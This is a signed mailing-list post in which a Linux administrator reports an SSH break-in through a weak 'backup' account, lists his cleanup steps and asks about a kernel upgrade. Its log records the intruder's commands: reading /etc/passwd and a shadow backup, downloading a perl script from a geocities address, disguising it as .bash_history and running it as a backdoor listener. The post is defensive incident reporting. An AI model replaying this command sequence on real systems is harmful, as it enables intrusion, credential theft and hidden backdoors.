-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Hi everybody,
guess it was my time - this time...
Ok .. about 4 hours ago the following happened on one of my machines: 1) Somebody tried from one host (213.215.220.14) a dictionary attack 2) He/She/It got in using the user backup (I know.. I know ..) 3) H/S/I downloaded 2 files from a geocities.com account 4) File 1 - no idea what it is or what it does - cannot find it 5) File 2 - a perl script that "claims" to be a telnet server
After taking the machine offline, I did the following:
a) locked user backup
b) removed password/interactive login from sshd (should have been done a long time ago)
c) killed the perl script running as user backup
d) find -user backup -mtime 1 > /tmp/file
e) nmap localhost for all ports
f) checked /tmp/file for "unknown files" - found /tmp/.bash_history
g) moved /tmp/.bash_history off the machine for analysis
Here is the snoopy log:
- ----
Feb 6 10:33:26 mail2 sshd[15544]: Accepted password for backup from 213.215.220.14 port 38842 ssh2
Feb 6 10:33:26 mail2 sshd[22307]: (pam_unix) session opened for user backup by (uid=0)
Feb 6 10:33:26 mail2 snoopy[25178]: [backup, uid:34 sid:25178]: -sh
Feb 6 10:33:26 mail2 snoopy[25087]: [backup, uid:34 sid:25178]: id -u
Feb 6 10:33:41 mail2 sshd[22307]: (pam_unix) session closed for user backup
Feb 6 10:57:26 mail2 sshd[1306]: Accepted keyboard-interactive/pam for backup from 66.40.38.102 port 45424 ssh2
Feb 6 10:57:26 mail2 sshd[4008]: (pam_unix) session opened for user backup by (uid=0)
Feb 6 10:57:26 mail2 snoopy[22447]: [backup, uid:34 sid:22447]: -sh
Feb 6 10:57:26 mail2 snoopy[10020]: [backup, uid:34 sid:22447]: id -u
Feb 6 10:57:30 mail2 snoopy[9165]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:57:35 mail2 snoopy[18242]: [backup, uid:34 sid:22447]: id
Feb 6 10:57:42 mail2 snoopy[27934]: [backup, uid:34 sid:22447]: uname - -a
Feb 6 10:57:47 mail2 snoopy[27769]: [backup, uid:34 sid:22447]: cat /etc/passwd
Feb 6 10:58:34 mail2 snoopy[19303]: [backup, uid:34 sid:22447]: /sbin/ifconfig
Feb 6 10:58:42 mail2 snoopy[31999]: [backup, uid:34 sid:22447]: cat /etc/hosts
Feb 6 10:59:06 mail2 snoopy[26230]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:59:09 mail2 snoopy[3092]: [backup, uid:34 sid:22447]: wget
Feb 6 10:59:26 mail2 snoopy[20851]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb 6 10:59:36 mail2 snoopy[25767]: [backup, uid:34 sid:22447]: cat shadow.bak
Feb 6 10:59:41 mail2 snoopy[31313]: [backup, uid:34 sid:22447]: ls -all
Feb 6 10:59:51 mail2 snoopy[14269]: [backup, uid:34 sid:22447]: wget geocities.com/c0_pampers/jam5.p
Feb 6 11:00:00 mail2 snoopy[1647]: [backup, uid:34 sid:22447]: mv jam5.pl.txt .bash_history
Feb 6 11:00:06 mail2 snoopy[22380]: [backup, uid:34 sid:22447]: chmod 755 .bash_history
Feb 6 11:00:10 mail2 snoopy[29495]: [backup, uid:34 sid:22447]: perl .bash_history
Feb 6 11:00:12 mail2 snoopy[29908]: [backup, uid:34 sid:22447]: ps -x
Feb 6 11:00:16 mail2 snoopy[4918]: [backup, uid:34 sid:22447]: ls -all
Feb 6 11:00:18 mail2 snoopy[12984]: [backup, uid:34 sid:22447]: w
Feb 6 11:01:20 mail2 sshd[4008]: (pam_unix) session closed for user backup
- ----
The telnetserver doesn't seem to make any entires in wtmp hence no `last` or `w` entries on the machine.
However, snoopy still sees uses from the user :)
ASAI can say H/S/I hasn't been on my machine since. The firewall didn't permit access to the port (34567)
opened by the perl script and my firewall log says no access to that port before I tried it from localhost.
The machine runs a linux 2.4.27-grsec-hi woody testing
I'm considering taking it back online with a 2.4.29-grsec-hi, what do you guys think?
- - Many thanks, Peter -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (Darwin)
iEYEARECAAYFAkIGSmMACgkQ7qdt1xpQls/FOwCfSDJbpUyuAMES5KYMQKQMVcCd im0AoIhY+DeJghyPAGm2Fv4RAuWvycQV =ctGL -----END PGP SIGNATURE-----
-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
